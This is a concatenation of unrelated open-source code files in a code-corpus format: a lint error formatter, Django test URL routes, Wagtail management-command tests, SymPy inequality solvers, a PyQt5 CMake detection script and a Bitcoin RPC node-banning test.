# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Utility functions to format errors."""
__author__ = ('robbyw@google.com (Robert Walker)',
'ajp@google.com (Andy Perelson)',
'nnaze@google.com (Nathan Naze)')
def GetUnixErrorOutput(filename, error, new_error=False):
"""Get a output line for an error in UNIX format."""
line = ''
if error.token:
line = '%d' % error.token.line_number
error_code = '%04d' % error.code
if new_error:
error_code = 'New Error ' + error_code
return '%s:%s:(%s) %s' % (filename, line, error_code, error.message)
def GetErrorOutput(error, new_error=False):
"""Get a output line for an error in regular format."""
line = ''
if error.token:
line = 'Line %d, ' % error.token.line_number
code = 'E:%04d' % error.code
error_message = error.message
if new_error:
error_message = 'New Error ' + error_message
return '%s%s: %s' % (line, code, error_message)
| bsd-3-clause |
GdZ/scriptfile | software/googleAppEngine/lib/django_1_2/tests/regressiontests/test_client_regress/urls.py | 46 | 1903 | from django.conf.urls.defaults import *
from django.views.generic.simple import redirect_to
import views
urlpatterns = patterns('',
(r'^no_template_view/$', views.no_template_view),
(r'^staff_only/$', views.staff_only_view),
(r'^get_view/$', views.get_view),
(r'^request_data/$', views.request_data),
(r'^request_data_extended/$', views.request_data, {'template':'extended.html', 'data':'bacon'}),
url(r'^arg_view/(?P<name>.+)/$', views.view_with_argument, name='arg_view'),
(r'^login_protected_redirect_view/$', views.login_protected_redirect_view),
(r'^redirects/$', redirect_to, {'url': '/test_client_regress/redirects/further/'}),
(r'^redirects/further/$', redirect_to, {'url': '/test_client_regress/redirects/further/more/'}),
(r'^redirects/further/more/$', redirect_to, {'url': '/test_client_regress/no_template_view/'}),
(r'^redirect_to_non_existent_view/$', redirect_to, {'url': '/test_client_regress/non_existent_view/'}),
(r'^redirect_to_non_existent_view2/$', redirect_to, {'url': '/test_client_regress/redirect_to_non_existent_view/'}),
(r'^redirect_to_self/$', redirect_to, {'url': '/test_client_regress/redirect_to_self/'}),
(r'^circular_redirect_1/$', redirect_to, {'url': '/test_client_regress/circular_redirect_2/'}),
(r'^circular_redirect_2/$', redirect_to, {'url': '/test_client_regress/circular_redirect_3/'}),
(r'^circular_redirect_3/$', redirect_to, {'url': '/test_client_regress/circular_redirect_1/'}),
(r'^set_session/$', views.set_session_view),
(r'^check_session/$', views.check_session_view),
(r'^request_methods/$', views.request_methods_view),
(r'^check_unicode/$', views.return_unicode),
(r'^parse_unicode_json/$', views.return_json_file),
(r'^check_headers/$', views.check_headers),
(r'^check_headers_redirect/$', redirect_to, {'url': '/test_client_regress/check_headers/'}),
)
| mit |
wagtail/wagtail | wagtail/core/tests/test_management_commands.py | 7 | 17243 | from datetime import timedelta
from io import StringIO
from unittest import mock
from django.contrib.auth import get_user_model
from django.core import management
from django.db import models
from django.test import TestCase
from django.utils import timezone
from wagtail.core.models import Collection, Page, PageLogEntry, PageRevision
from wagtail.core.signals import page_published, page_unpublished
from wagtail.tests.testapp.models import EventPage, SimplePage
class TestFixTreeCommand(TestCase):
fixtures = ['test.json']
def badly_delete_page(self, page):
# Deletes a page the wrong way.
# This will not update numchild and may leave orphans
models.Model.delete(page)
def run_command(self, **options):
options.setdefault('interactive', False)
output = StringIO()
management.call_command('fixtree', stdout=output, **options)
output.seek(0)
return output
def test_fixes_numchild(self):
# Get homepage and save old value
homepage = Page.objects.get(url_path='/home/')
old_numchild = homepage.numchild
# Break it
homepage.numchild = 12345
homepage.save()
# Check that its broken
self.assertEqual(Page.objects.get(url_path='/home/').numchild, 12345)
# Call command
self.run_command()
# Check if its fixed
self.assertEqual(Page.objects.get(url_path='/home/').numchild, old_numchild)
def test_fixes_depth(self):
# Get homepage and save old value
homepage = Page.objects.get(url_path='/home/')
old_depth = homepage.depth
# Break it
homepage.depth = 12345
homepage.save()
# also break the root collection's depth
root_collection = Collection.get_first_root_node()
root_collection.depth = 42
root_collection.save()
# Check that its broken
self.assertEqual(Page.objects.get(url_path='/home/').depth, 12345)
self.assertEqual(Collection.objects.get(id=root_collection.id).depth, 42)
# Call command
self.run_command()
# Check if its fixed
self.assertEqual(Page.objects.get(url_path='/home/').depth, old_depth)
self.assertEqual(Collection.objects.get(id=root_collection.id).depth, 1)
def test_detects_orphans(self):
events_index = Page.objects.get(url_path='/home/events/')
christmas_page = EventPage.objects.get(url_path='/home/events/christmas/')
# Delete the events index badly
self.badly_delete_page(events_index)
# Check that christmas_page is still in the tree
self.assertTrue(Page.objects.filter(id=christmas_page.id).exists())
# Call command
output = self.run_command()
# Check that the issues were detected
output_string = output.read()
self.assertIn("Incorrect numchild value found for pages: [2]", output_string)
# Note that page ID 15 was also deleted, but is not picked up here, as
# it is a child of 14.
self.assertIn("Orphaned pages found: [4, 5, 6, 9, 13, 15]", output_string)
# Check that christmas_page is still in the tree
self.assertTrue(Page.objects.filter(id=christmas_page.id).exists())
def test_deletes_orphans(self):
events_index = Page.objects.get(url_path='/home/events/')
christmas_page = EventPage.objects.get(url_path='/home/events/christmas/')
# Delete the events index badly
self.badly_delete_page(events_index)
# Check that christmas_page is still in the tree
self.assertTrue(Page.objects.filter(id=christmas_page.id).exists())
# Call command
# delete_orphans simulates a user pressing "y" at the prompt
output = self.run_command(delete_orphans=True)
# Check that the issues were detected
output_string = output.read()
self.assertIn("Incorrect numchild value found for pages: [2]", output_string)
self.assertIn("7 orphaned pages deleted.", output_string)
# Check that christmas_page has been deleted
self.assertFalse(Page.objects.filter(id=christmas_page.id).exists())
def test_remove_path_holes(self):
events_index = Page.objects.get(url_path='/home/events/')
# Delete the event page in path position 0001
Page.objects.get(path=events_index.path + '0001').delete()
self.run_command(full=True)
# the gap at position 0001 should have been closed
events_index = Page.objects.get(url_path='/home/events/')
self.assertTrue(Page.objects.filter(path=events_index.path + '0001').exists())
class TestMovePagesCommand(TestCase):
fixtures = ['test.json']
def run_command(self, from_, to):
management.call_command('move_pages', str(from_), str(to), stdout=StringIO())
def test_move_pages(self):
# Get pages
events_index = Page.objects.get(url_path='/home/events/')
about_us = Page.objects.get(url_path='/home/about-us/')
page_ids = events_index.get_children().values_list('id', flat=True)
# Move all events into "about us"
self.run_command(events_index.id, about_us.id)
# Check that all pages moved
for page_id in page_ids:
self.assertEqual(Page.objects.get(id=page_id).get_parent(), about_us)
class TestSetUrlPathsCommand(TestCase):
fixtures = ['test.json']
def run_command(self):
management.call_command('set_url_paths', stdout=StringIO())
def test_set_url_paths(self):
self.run_command()
class TestReplaceTextCommand(TestCase):
fixtures = ['test.json']
def run_command(self, from_text, to_text):
management.call_command('replace_text', from_text, to_text, stdout=StringIO())
def test_replace_text(self):
# Check that the christmas page is definitely about christmas
christmas_page = EventPage.objects.get(url_path='/home/events/christmas/')
self.assertEqual(christmas_page.title, "Christmas")
self.assertEqual(christmas_page.speakers.first().last_name, "Christmas")
self.assertEqual(christmas_page.advert_placements.first().colour, "greener than a Christmas tree")
# Make it about easter
self.run_command("Christmas", "Easter")
# Check that it's now about easter
easter_page = EventPage.objects.get(url_path='/home/events/christmas/')
self.assertEqual(easter_page.title, "Easter")
# Check that we also update the child objects (including advert_placements, which is defined on the superclass)
self.assertEqual(easter_page.speakers.first().last_name, "Easter")
self.assertEqual(easter_page.advert_placements.first().colour, "greener than a Easter tree")
class TestPublishScheduledPagesCommand(TestCase):
def setUp(self):
# Find root page
self.root_page = Page.objects.get(id=2)
def test_go_live_page_will_be_published(self):
# Connect a mock signal handler to page_published signal
signal_fired = [False]
signal_page = [None]
def page_published_handler(sender, instance, **kwargs):
signal_fired[0] = True
signal_page[0] = instance
page_published.connect(page_published_handler)
page = SimplePage(
title="Hello world!",
slug="hello-world",
content="hello",
live=False,
has_unpublished_changes=True,
go_live_at=timezone.now() - timedelta(days=1),
)
self.root_page.add_child(instance=page)
page.save_revision(approved_go_live_at=timezone.now() - timedelta(days=1))
p = Page.objects.get(slug='hello-world')
self.assertFalse(p.live)
self.assertTrue(PageRevision.objects.filter(page=p).exclude(approved_go_live_at__isnull=True).exists())
management.call_command('publish_scheduled_pages')
p = Page.objects.get(slug='hello-world')
self.assertTrue(p.live)
self.assertTrue(p.first_published_at)
self.assertFalse(p.has_unpublished_changes)
self.assertFalse(PageRevision.objects.filter(page=p).exclude(approved_go_live_at__isnull=True).exists())
# Check that the page_published signal was fired
self.assertTrue(signal_fired[0])
self.assertEqual(signal_page[0], page)
self.assertEqual(signal_page[0], signal_page[0].specific)
def test_go_live_when_newer_revision_exists(self):
page = SimplePage(
title="Hello world!",
slug="hello-world",
content="hello",
live=False,
has_unpublished_changes=True,
go_live_at=timezone.now() - timedelta(days=1),
)
self.root_page.add_child(instance=page)
page.save_revision(approved_go_live_at=timezone.now() - timedelta(days=1))
page.title = "Goodbye world!"
page.save_revision(submitted_for_moderation=False)
management.call_command('publish_scheduled_pages')
p = Page.objects.get(slug='hello-world')
self.assertTrue(p.live)
self.assertTrue(p.has_unpublished_changes)
self.assertEqual(p.title, "Hello world!")
def test_future_go_live_page_will_not_be_published(self):
page = SimplePage(
title="Hello world!",
slug="hello-world",
content="hello",
live=False,
go_live_at=timezone.now() + timedelta(days=1),
)
self.root_page.add_child(instance=page)
page.save_revision(approved_go_live_at=timezone.now() - timedelta(days=1))
p = Page.objects.get(slug='hello-world')
self.assertFalse(p.live)
self.assertTrue(PageRevision.objects.filter(page=p).exclude(approved_go_live_at__isnull=True).exists())
management.call_command('publish_scheduled_pages')
p = Page.objects.get(slug='hello-world')
self.assertFalse(p.live)
self.assertTrue(PageRevision.objects.filter(page=p).exclude(approved_go_live_at__isnull=True).exists())
def test_expired_page_will_be_unpublished(self):
# Connect a mock signal handler to page_unpublished signal
signal_fired = [False]
signal_page = [None]
def page_unpublished_handler(sender, instance, **kwargs):
signal_fired[0] = True
signal_page[0] = instance
page_unpublished.connect(page_unpublished_handler)
page = SimplePage(
title="Hello world!",
slug="hello-world",
content="hello",
live=True,
has_unpublished_changes=False,
expire_at=timezone.now() - timedelta(days=1),
)
self.root_page.add_child(instance=page)
p = Page.objects.get(slug='hello-world')
self.assertTrue(p.live)
management.call_command('publish_scheduled_pages')
p = Page.objects.get(slug='hello-world')
self.assertFalse(p.live)
self.assertTrue(p.has_unpublished_changes)
self.assertTrue(p.expired)
# Check that the page_unpublished signal was fired
self.assertTrue(signal_fired[0])
self.assertEqual(signal_page[0], page)
self.assertEqual(signal_page[0], signal_page[0].specific)
def test_future_expired_page_will_not_be_unpublished(self):
page = SimplePage(
title="Hello world!",
slug="hello-world",
content="hello",
live=True,
expire_at=timezone.now() + timedelta(days=1),
)
self.root_page.add_child(instance=page)
p = Page.objects.get(slug='hello-world')
self.assertTrue(p.live)
management.call_command('publish_scheduled_pages')
p = Page.objects.get(slug='hello-world')
self.assertTrue(p.live)
self.assertFalse(p.expired)
def test_expired_pages_are_dropped_from_mod_queue(self):
page = SimplePage(
title="Hello world!",
slug="hello-world",
content="hello",
live=False,
expire_at=timezone.now() - timedelta(days=1),
)
self.root_page.add_child(instance=page)
page.save_revision(submitted_for_moderation=True)
p = Page.objects.get(slug='hello-world')
self.assertFalse(p.live)
self.assertTrue(PageRevision.objects.filter(page=p, submitted_for_moderation=True).exists())
management.call_command('publish_scheduled_pages')
p = Page.objects.get(slug='hello-world')
self.assertFalse(PageRevision.objects.filter(page=p, submitted_for_moderation=True).exists())
class TestPurgeRevisionsCommand(TestCase):
fixtures = ['test.json']
def setUp(self):
# Find root page
self.root_page = Page.objects.get(id=2)
self.page = SimplePage(
title="Hello world!",
slug="hello-world",
content="hello",
live=False,
)
self.root_page.add_child(instance=self.page)
self.page.refresh_from_db()
def run_command(self, days=None):
if days:
days_input = '--days=' + str(days)
return management.call_command('purge_revisions', days_input, stdout=StringIO())
return management.call_command('purge_revisions', stdout=StringIO())
def test_latest_revision_not_purged(self):
revision_1 = self.page.save_revision()
revision_2 = self.page.save_revision()
self.run_command()
# revision 1 should be deleted, revision 2 should not be
self.assertNotIn(revision_1, PageRevision.objects.filter(page=self.page))
self.assertIn(revision_2, PageRevision.objects.filter(page=self.page))
def test_revisions_in_moderation_not_purged(self):
self.page.save_revision(submitted_for_moderation=True)
revision = self.page.save_revision()
self.run_command()
self.assertTrue(PageRevision.objects.filter(page=self.page, submitted_for_moderation=True).exists())
try:
from wagtail.core.models import Task, Workflow, WorkflowTask
workflow = Workflow.objects.create(name='test_workflow')
task_1 = Task.objects.create(name='test_task_1')
user = get_user_model().objects.first()
WorkflowTask.objects.create(workflow=workflow, task=task_1, sort_order=1)
workflow.start(self.page, user)
self.page.save_revision()
self.run_command()
# even though no longer the latest revision, the old revision should stay as it is
# attached to an in progress workflow
self.assertIn(revision, PageRevision.objects.filter(page=self.page))
except ImportError:
pass
def test_revisions_with_approve_go_live_not_purged(self):
approved_revision = self.page.save_revision(approved_go_live_at=timezone.now() + timedelta(days=1))
self.page.save_revision()
self.run_command()
self.assertIn(approved_revision, PageRevision.objects.filter(page=self.page))
def test_purge_revisions_with_date_cutoff(self):
old_revision = self.page.save_revision()
self.page.save_revision()
self.run_command(days=30)
# revision should not be deleted, as it is younger than 30 days
self.assertIn(old_revision, PageRevision.objects.filter(page=self.page))
old_revision.created_at = timezone.now() - timedelta(days=31)
old_revision.save()
self.run_command(days=30)
# revision is now older than 30 days, so should be deleted
self.assertNotIn(old_revision, PageRevision.objects.filter(page=self.page))
class TestCreateLogEntriesFromRevisionsCommand(TestCase):
fixtures = ['test.json']
def setUp(self):
self.page = SimplePage(
title="Hello world!",
slug="hello-world",
content="hello",
live=False,
expire_at=timezone.now() - timedelta(days=1),
)
Page.objects.get(id=2).add_child(instance=self.page)
# Create empty revisions, which should not be converted to log entries
for i in range(3):
self.page.save_revision()
# Add another revision with a content change
self.page.title = "Hello world!!"
revision = self.page.save_revision()
revision.publish()
# clean up log entries
PageLogEntry.objects.all().delete()
def test_log_entries_created_from_revisions(self):
management.call_command('create_log_entries_from_revisions')
# Should not create entries for empty revisions.
self.assertListEqual(
list(PageLogEntry.objects.values_list("action", flat=True)),
['wagtail.publish', 'wagtail.edit', 'wagtail.create']
)
def test_command_doesnt_crash_for_revisions_without_page_model(self):
with mock.patch(
'wagtail.core.models.ContentType.model_class',
return_value=None,
):
management.call_command('create_log_entries_from_revisions')
self.assertEqual(PageLogEntry.objects.count(), 0)
| bsd-3-clause |
srjoglekar246/sympy | sympy/solvers/inequalities.py | 2 | 11736 | """Tools for solving inequalities and systems of inequalities. """
from sympy.core import Symbol, Interval
from sympy.core.relational import Relational, Eq, Ge, Lt
from sympy.core.singleton import S
from sympy.assumptions import ask, AppliedPredicate, Q
from sympy.functions import re, im, Abs
from sympy.logic import And
from sympy.polys import Poly
def solve_poly_inequality(poly, rel):
"""Solve a polynomial inequality with rational coefficients.
Examples
========
>>> from sympy import Poly
>>> from sympy.abc import x
>>> from sympy.solvers.inequalities import solve_poly_inequality
>>> solve_poly_inequality(Poly(x, x, domain='ZZ'), '==')
[{0}]
>>> solve_poly_inequality(Poly(x**2 - 1, x, domain='ZZ'), '!=')
[(-oo, -1), (-1, 1), (1, oo)]
>>> solve_poly_inequality(Poly(x**2 - 1, x, domain='ZZ'), '==')
[{-1}, {1}]
See Also
========
solve_poly_inequalities
"""
reals, intervals = poly.real_roots(multiple=False), []
if rel == '==':
for root, _ in reals:
interval = Interval(root, root)
intervals.append(interval)
elif rel == '!=':
left = S.NegativeInfinity
for right, _ in reals + [(S.Infinity, 1)]:
interval = Interval(left, right, True, True)
intervals.append(interval)
left = right
else:
if poly.LC() > 0:
sign = +1
else:
sign = -1
eq_sign, equal = None, False
if rel == '>':
eq_sign = +1
elif rel == '<':
eq_sign = -1
elif rel == '>=':
eq_sign, equal = +1, True
elif rel == '<=':
eq_sign, equal = -1, True
else:
raise ValueError("'%s' is not a valid relation" % rel)
right, right_open = S.Infinity, True
reals.sort(key=lambda w: w[0], reverse=True)
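# Scan the real roots from largest to smallest: the polynomial's sign flips at roots of odd
# multiplicity, and an interval is emitted whenever the current sign matches the requested relation.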
for left, multiplicity in reals:
if multiplicity % 2:
if sign == eq_sign:
intervals.insert(0, Interval(left, right, not equal, right_open))
sign, right, right_open = -sign, left, not equal
else:
if sign == eq_sign and not equal:
intervals.insert(0, Interval(left, right, True, right_open))
right, right_open = left, True
elif sign != eq_sign and equal:
intervals.insert(0, Interval(left, left))
if sign == eq_sign:
intervals.insert(0, Interval(S.NegativeInfinity, right, True, right_open))
return intervals
def solve_poly_inequalities(polys):
"""Solve a system of polynomial inequalities with rational coefficients.
Examples
========
>>> from sympy.abc import x
>>> from sympy import Poly
>>> from sympy.solvers.inequalities import solve_poly_inequalities
>>> solve_poly_inequalities([[(Poly(-x + 1, x, domain='ZZ'), '>='),
... (Poly(-x + 1, x, domain='ZZ'), '<=')]])
{1}
>>> solve_poly_inequalities([[(Poly(x, x, domain='ZZ'), '!='),
... (Poly(-x + 1, x, domain='ZZ'), '>=')]])
(-oo, 0) U (0, 1]
See Also
========
solve_poly_inequality
"""
result = S.EmptySet
for _polys in polys:
global_intervals = None
for poly, rel in _polys:
local_intervals = solve_poly_inequality(poly, rel)
if global_intervals is None:
global_intervals = local_intervals
else:
intervals = []
for local_interval in local_intervals:
for global_interval in global_intervals:
interval = local_interval.intersect(global_interval)
if interval is not S.EmptySet:
intervals.append(interval)
global_intervals = intervals
if not global_intervals:
break
for interval in global_intervals:
result = result.union(interval)
return result
def reduce_poly_inequalities(exprs, gen, assume=True, relational=True):
"""Reduce a system of polynomial inequalities with rational coefficients.
Examples
========
>>> from sympy import Poly, Symbol
>>> from sympy.solvers.inequalities import reduce_poly_inequalities
>>> x = Symbol('x', real=True)
>>> reduce_poly_inequalities([[x**2 <= 0]], x)
x == 0
>>> reduce_poly_inequalities([[x + 2 > 0]], x)
-2 < x
"""
exact = True
polys = []
for _exprs in exprs:
_polys = []
for expr in _exprs:
if isinstance(expr, tuple):
expr, rel = expr
else:
if expr.is_Relational:
expr, rel = expr.lhs - expr.rhs, expr.rel_op
else:
expr, rel = expr, '=='
poly = Poly(expr, gen)
if not poly.get_domain().is_Exact:
poly, exact = poly.to_exact(), False
domain = poly.get_domain()
if not (domain.is_ZZ or domain.is_QQ):
raise NotImplementedError("inequality solving is not supported over %s" % domain)
_polys.append((poly, rel))
polys.append(_polys)
solution = solve_poly_inequalities(polys)
if not exact:
solution = solution.evalf()
if not relational:
return solution
real = ask(Q.real(gen), assumptions=assume)
if not real:
result = And(solution.as_relational(re(gen)), Eq(im(gen), 0))
else:
result = solution.as_relational(gen)
return result
def reduce_abs_inequality(expr, rel, gen, assume=True):
"""Reduce an inequality with nested absolute values.
Examples
========
>>> from sympy import Q, Abs
>>> from sympy.abc import x
>>> from sympy.solvers.inequalities import reduce_abs_inequality
>>> reduce_abs_inequality(Abs(x - 5) - 3, '<', x, assume=Q.real(x))
And(2 < x, x < 8)
>>> reduce_abs_inequality(Abs(x + 2)*3 - 13, '<', x, assume=Q.real(x))
And(-19/3 < x, x < 7/3)
See Also
========
reduce_abs_inequalities
"""
if not ask(Q.real(gen), assumptions=assume):
raise NotImplementedError("can't solve inequalities with absolute values of a complex variable")
def _bottom_up_scan(expr):
exprs = []
if expr.is_Add or expr.is_Mul:
op = expr.__class__
for arg in expr.args:
_exprs = _bottom_up_scan(arg)
if not exprs:
exprs = _exprs
else:
args = []
for expr, conds in exprs:
for _expr, _conds in _exprs:
args.append((op(expr, _expr), conds + _conds))
exprs = args
elif expr.is_Pow:
n = expr.exp
if not n.is_Integer or n < 0:
raise ValueError("only non-negative integer powers are allowed")
_exprs = _bottom_up_scan(expr.base)
for expr, conds in _exprs:
exprs.append((expr**n, conds))
elif isinstance(expr, Abs):
_exprs = _bottom_up_scan(expr.args[0])
for expr, conds in _exprs:
exprs.append(( expr, conds + [Ge(expr, 0)]))
exprs.append((-expr, conds + [Lt(expr, 0)]))
else:
exprs = [(expr, [])]
return exprs
exprs = _bottom_up_scan(expr)
mapping = {'<': '>', '<=': '>='}
inequalities = []
for expr, conds in exprs:
if rel not in mapping.keys():
expr = Relational( expr, 0, rel)
else:
expr = Relational(-expr, 0, mapping[rel])
inequalities.append([expr] + conds)
return reduce_poly_inequalities(inequalities, gen, assume)
def reduce_abs_inequalities(exprs, gen, assume=True):
"""Reduce a system of inequalities with nested absolute values.
Examples
========
>>> from sympy import Q, Abs
>>> from sympy.abc import x
>>> from sympy.solvers.inequalities import reduce_abs_inequalities
>>> reduce_abs_inequalities([(Abs(3*x - 5) - 7, '<'),
... (Abs(x + 25) - 13, '>')], x, assume=Q.real(x))
And(-2/3 < x, Or(-12 < x, x < -38), x < 4)
>>> reduce_abs_inequalities([(Abs(x - 4) + Abs(3*x - 5) - 7, '<')], x,
... assume=Q.real(x))
And(1/2 < x, x < 4)
See Also
========
reduce_abs_inequality
"""
return And(*[ reduce_abs_inequality(expr, rel, gen, assume) for expr, rel in exprs ])
def _solve_inequality(ie, s):
""" A hacky replacement for solve, since the latter only works for
univariate inequalities. """
from sympy import Poly
if not ie.rel_op in ('>', '>=', '<', '<='):
raise NotImplementedError
expr = ie.lhs - ie.rhs
p = Poly(expr, s)
if p.degree() != 1:
raise NotImplementedError('%s' % ie)
a, b = p.all_coeffs()
if a.is_positive:
return ie.func(s, -b/a)
elif a.is_negative:
return ie.func(-b/a, s)
else:
raise NotImplementedError
def reduce_inequalities(inequalities, assume=True, symbols=[]):
"""Reduce a system of inequalities with rational coefficients.
Examples
========
>>> from sympy import Q, sympify as S
>>> from sympy.abc import x, y
>>> from sympy.solvers.inequalities import reduce_inequalities
>>> reduce_inequalities(S(0) <= x + 3, Q.real(x), [])
-3 <= x
>>> reduce_inequalities(S(0) <= x + y*2 - 1, True, [x])
-2*y + 1 <= x
"""
if not hasattr(inequalities, '__iter__'):
inequalities = [inequalities]
if len(inequalities) == 1 and len(symbols) == 1 \
and inequalities[0].is_Relational:
try:
return _solve_inequality(inequalities[0], symbols[0])
except NotImplementedError:
pass
poly_part, abs_part, extra_assume = {}, {}, []
for inequality in inequalities:
if isinstance(inequality, bool):
if inequality is False:
return False
else:
continue
if isinstance(inequality, AppliedPredicate):
extra_assume.append(inequality)
continue
if inequality.is_Relational:
expr, rel = inequality.lhs - inequality.rhs, inequality.rel_op
else:
expr, rel = inequality, '=='
gens = expr.atoms(Symbol)
if not gens:
return False
elif len(gens) == 1:
gen = gens.pop()
else:
raise NotImplementedError("only univariate inequalities are supported")
components = expr.find(lambda u: u.is_Function)
if not components:
if gen in poly_part:
poly_part[gen].append((expr, rel))
else:
poly_part[gen] = [(expr, rel)]
else:
if all(isinstance(comp, Abs) for comp in components):
if gen in abs_part:
abs_part[gen].append((expr, rel))
else:
abs_part[gen] = [(expr, rel)]
else:
raise NotImplementedError("can't reduce %s" % inequalities)
extra_assume = And(*extra_assume)
if assume is not None:
assume = And(assume, extra_assume)
else:
assume = extra_assume
poly_reduced = []
abs_reduced = []
for gen, exprs in poly_part.iteritems():
poly_reduced.append(reduce_poly_inequalities([exprs], gen, assume))
for gen, exprs in abs_part.iteritems():
abs_reduced.append(reduce_abs_inequalities(exprs, gen, assume))
return And(*(poly_reduced + abs_reduced))
| bsd-3-clause |
ccrook/Quantum-GIS | cmake/FindPyQt5.py | 9 | 3619 | # -*- coding: utf-8 -*-
#
# Copyright (c) 2007, Simon Edwards <simon@simonzone.com>
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * Neither the name of the Simon Edwards <simon@simonzone.com> nor the
# names of its contributors may be used to endorse or promote products
# derived from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY Simon Edwards <simon@simonzone.com> ''AS IS'' AND ANY
# EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL Simon Edwards <simon@simonzone.com> BE LIABLE FOR ANY
# DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
# FindPyQt.py
# Copyright (c) 2007, Simon Edwards <simon@simonzone.com>
# Redistribution and use is allowed according to the terms of the BSD license.
# For details see the accompanying COPYING-CMAKE-SCRIPTS file.
try:
import PyQt5.pyqtconfig
pyqtcfg = PyQt5.pyqtconfig.Configuration()
except ImportError:
import PyQt5.QtCore
import sipconfig # won't work for SIP v5
import os.path
import sys
cfg = sipconfig.Configuration()
sip_dir = cfg.default_sip_dir
if sys.platform.startswith('freebsd'):
py_version = str(sys.version_info.major) + str(sys.version_info.minor)
sip_dir = sip_dir.replace(py_version, '')
for p in (os.path.join(sip_dir, "PyQt5"),
os.path.join(sip_dir, "PyQt5-3"),
sip_dir):
if os.path.exists(os.path.join(p, "QtCore", "QtCoremod.sip")):
sip_dir = p
break
cfg = {
'pyqt_version': PyQt5.QtCore.PYQT_VERSION,
'pyqt_version_str': PyQt5.QtCore.PYQT_VERSION_STR,
'pyqt_sip_flags': PyQt5.QtCore.PYQT_CONFIGURATION['sip_flags'],
'pyqt_mod_dir': os.path.join(cfg.default_mod_dir, "PyQt5"),
'pyqt_sip_dir': sip_dir,
'pyqt_bin_dir': cfg.default_bin_dir,
}
pyqtcfg = sipconfig.Configuration([cfg])
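# Note (added for clarity, not part of the original file): the key:value lines
# printed below go to stdout so that the calling CMake code can capture and
# parse them; the exact CMake variable names they end up in are not shown here.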
print("pyqt_version:%06.0x" % pyqtcfg.pyqt_version)
print("pyqt_version_num:%d" % pyqtcfg.pyqt_version)
print("pyqt_version_str:%s" % pyqtcfg.pyqt_version_str)
pyqt_version_tag = ""
in_t = False
for item in pyqtcfg.pyqt_sip_flags.split(' '):
if item == "-t":
in_t = True
elif in_t:
if item.startswith("Qt_4"):
pyqt_version_tag = item
else:
in_t = False
print("pyqt_version_tag:%s" % pyqt_version_tag)
print("pyqt_mod_dir:%s" % pyqtcfg.pyqt_mod_dir)
print("pyqt_sip_dir:%s" % pyqtcfg.pyqt_sip_dir)
print("pyqt_sip_flags:%s" % pyqtcfg.pyqt_sip_flags)
print("pyqt_bin_dir:%s" % pyqtcfg.pyqt_bin_dir)
| gpl-2.0 |
torresalyssa/bitcoin | qa/rpc-tests/nodehandling.py | 56 | 3626 | #!/usr/bin/env python2
# Copyright (c) 2014 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
#
# Test node handling
#
from test_framework.test_framework import BitcoinTestFramework
from test_framework.util import *
import base64
try:
import http.client as httplib
except ImportError:
import httplib
try:
import urllib.parse as urlparse
except ImportError:
import urlparse
class NodeHandlingTest (BitcoinTestFramework):
def run_test(self):
###########################
# setban/listbanned tests #
###########################
assert_equal(len(self.nodes[2].getpeerinfo()), 4) #we should have 4 nodes at this point
self.nodes[2].setban("127.0.0.1", "add")
time.sleep(3) #wait till the nodes are disconnected
assert_equal(len(self.nodes[2].getpeerinfo()), 0) #all nodes must be disconnected at this point
assert_equal(len(self.nodes[2].listbanned()), 1)
self.nodes[2].clearbanned()
assert_equal(len(self.nodes[2].listbanned()), 0)
self.nodes[2].setban("127.0.0.0/24", "add")
assert_equal(len(self.nodes[2].listbanned()), 1)
try:
self.nodes[2].setban("127.0.0.1", "add") #throws exception because 127.0.0.1 is within range 127.0.0.0/24
except:
pass
assert_equal(len(self.nodes[2].listbanned()), 1) #still only one banned ip because 127.0.0.1 is within the range of 127.0.0.0/24
try:
self.nodes[2].setban("127.0.0.1", "remove")
except:
pass
assert_equal(len(self.nodes[2].listbanned()), 1)
self.nodes[2].setban("127.0.0.0/24", "remove")
assert_equal(len(self.nodes[2].listbanned()), 0)
self.nodes[2].clearbanned()
assert_equal(len(self.nodes[2].listbanned()), 0)
##test persisted banlist
self.nodes[2].setban("127.0.0.0/32", "add")
self.nodes[2].setban("127.0.0.0/24", "add")
self.nodes[2].setban("192.168.0.1", "add", 1) #ban for 1 seconds
self.nodes[2].setban("2001:4d48:ac57:400:cacf:e9ff:fe1d:9c63/19", "add", 1000) #ban for 1000 seconds
listBeforeShutdown = self.nodes[2].listbanned();
assert_equal("192.168.0.1/255.255.255.255", listBeforeShutdown[2]['address']) #must be here
time.sleep(2) #make 100% sure we expired 192.168.0.1 node time
#stop node
stop_node(self.nodes[2], 2)
self.nodes[2] = start_node(2, self.options.tmpdir)
listAfterShutdown = self.nodes[2].listbanned();
assert_equal("127.0.0.0/255.255.255.0", listAfterShutdown[0]['address'])
assert_equal("127.0.0.0/255.255.255.255", listAfterShutdown[1]['address'])
assert_equal("2001:4000::/ffff:e000:0:0:0:0:0:0", listAfterShutdown[2]['address'])
###########################
# RPC disconnectnode test #
###########################
url = urlparse.urlparse(self.nodes[1].url)
self.nodes[0].disconnectnode(url.hostname+":"+str(p2p_port(1)))
time.sleep(2) #disconnecting a node needs a little bit of time
for node in self.nodes[0].getpeerinfo():
assert(node['addr'] != url.hostname+":"+str(p2p_port(1)))
connect_nodes_bi(self.nodes,0,1) #reconnect the node
